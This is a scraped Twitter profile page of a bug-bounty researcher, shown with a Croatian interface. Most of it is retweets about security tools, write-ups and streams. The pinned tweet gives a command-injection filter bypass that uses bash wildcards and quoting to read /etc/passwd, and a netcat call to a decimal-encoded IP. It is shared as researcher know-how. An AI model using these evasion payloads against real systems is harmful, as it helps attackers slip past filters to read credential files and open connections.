Omar Espino

@omespino

security hall of fame : • google (top 100) • microsoft • facebook • twitter • telegram • netflix • slack • yahoo • nokia • sony • etc •

http://0/
Vrijeme pridruživanja: kolovoz 2010.

Tweetovi

Blokirali ste korisnika/cu @omespino

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @omespino

  1. Prikvačeni tweet
    23. svi 2018.

    can somebody read your passwd file with: "/???/?at /???/????w?" ? yes. bypass blacklisted words filter (or firewalls) via bash wildcards. /b'i'n/c'a't /e't'c/p'a's's'w'd' /???/?at /???/????w? /usr/b'i'n/'n'c 2130706433 80 /???/???/n? 2130706433 80

    Poništi
  2. proslijedio/la je Tweet
    prije 3 sata

    Easily monitor the exposure of your Kubernetes cluster using the kube-shodan project. It automatically syncs the external IPs with Shodan Monitor to help you keep track of what's exposed to the Internet:

    Poništi
  3. proslijedio/la je Tweet
    prije 3 sata

    Hey bug hunters! Want a look at some of the top vulnerabilities ever found on ? They just released the last blog post I wrote before leaving. Enjoy!

    Prikaži ovu nit
    Poništi
  4. proslijedio/la je Tweet
    Poništi
  5. proslijedio/la je Tweet
    31. sij

    Just released a quick tool, wordlistgen, I put together for taking a list of URLs/paths from stdin and parsing components (subdomains, paths, query strings & values) to easily/quickly make contextual content discovery wordlists for

    Prikaži ovu nit
    Poništi
  6. proslijedio/la je Tweet
    2. velj

    There's a new repository for payload generators and helper scripts for ffuf. I wrote a HTTP basic authentication payload generator as an example. Contributions are more than welcome, it's show & tell time!

    Poništi
  7. proslijedio/la je Tweet
    2. velj

    This month I learnt how to analyse the JavaScript of a React Native application while bounty hunting. I wanted to share what I found out with everyone else.

    Poništi
  8. 1. velj
    Poništi
  9. proslijedio/la je Tweet
    9. stu 2019.

    1999: David Bowie explains why the internet is not just another tool, why it’s not simply a different delivery system

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    31. sij

    😱😱😱 is joining me on my stream this Sunday and we have a lot to talk about. I’m excited to see what makes zseano’s approach so unique and how he looks for bugs when he’s hacking!

    Poništi
  11. proslijedio/la je Tweet
    31. sij

    , , and I are starting a new security blog. In our first write-up, we will discuss the impact of "SameSite by default" and how it affects web app sec. Feel free to request future topics you would like us to cover.

    Poništi
  12. proslijedio/la je Tweet
    31. sij

    I have been playing with Singularity framework the past few days, working on a DNS rebinding exploit and I felt giving credits here is the least I can do. This is such great work !

    Poništi
  13. proslijedio/la je Tweet
    30. sij

    I published another blog today. This is a story about an interesting SQL Injection I found. “A Not-So-Blind RCE with SQL Injection” by Prashant Kumar

    Poništi
  14. Poništi
  15. proslijedio/la je Tweet
    30. sij

    Stream #4 is up on Youtube! These segments I call "Tool Time" and go through some new-ish bounty/appsec tradecraft + tools. Enjoy!

    Poništi
  16. proslijedio/la je Tweet
    30. sij

    Episode #2 - We sit down with to talk about how to be successful in bug bounty, live events, music and creativity and of course, how to reach cosmic brain level 10. Listen on

    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet

    2019 has been a record-breaking year on lots of fronts - thanks to you all! Keep up your awesome discoveries.

    Poništi
  18. proslijedio/la je Tweet
    30. sij

    That monitoring service in is just awesome and saves a lot of time :)

    Poništi
  19. proslijedio/la je Tweet
    30. sij

    Im really going to enjoy this. Parse current JS files for endpoints Scrape endpoints from wayback create wordlist of endpoints Run through FFUF Bring into burp for further testing.

    Poništi
  20. proslijedio/la je Tweet
    30. sij
    Poništi
  21. proslijedio/la je Tweet
    28. sij

    [Educational] One of the best blog posts that I ever read about going from 0 to unauth RCE in f**king Mikrotik OS step by step:

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·